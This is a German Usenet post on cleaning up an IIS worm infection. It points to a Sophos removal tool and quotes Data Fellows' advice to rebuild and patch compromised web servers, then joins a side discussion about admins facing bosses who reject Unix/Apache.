Und für die gibt es sogar schon ein Tool von Sophos. Allerdings dauert
die Prozedur auch einige Stunden und für NTFS braucht man NTFSDOS Pro
(o.ä).
http://www.sophos.com/downloads/readswnm.txt
Datafellows: "If your web site is running an unsafe version of IIS,
the worm can infect your site by accessing it through http. After this
it will restart spreading from your server. In this case, it is not
enough to just clean the virus - your web server is unsafe and has
been so for a while. It's likely there have been previous illegimate
accesses to your site as well and it should be considered compromised.
We recommend rebuilding the web server and applying latest patches
before restoring clean copies of the html pages."
Dem ist wohl nichts hinzuzufügen.
Bis denne
Jens
> * Aik Richter <aric...@fonts.de> wrote:
> [...]
>> Wenn z.B. ein Admin vorschlägt, die eminent wichtigen websites doch
>> besser auf UNIX/Apache laufen zu lassen, udn der Chef das ablehnt ("Wir
>> benutzen MS-Software, weil eine richtige Firma nciht mit solchen
>> Freakkram wie LINUX arbeitet"), dann kann der ADMIN gar nix machen.
>
> Doch! Kuendigen. Und das ist ernst gemeint. Nicht ueberall laeuft es so,
> wie Du das beschreibst.
Kann ich bestätigen. Und dazu muss man nicht in eine Freakfirma gehen.
Es gibt genügend Rechenzentren, wo OS/390, OS/2, Wixdos, Solaris, AIX
und Linux eingesetzt werden - jenachdem unter was die Anwendung am
besten und günstigsten läuft.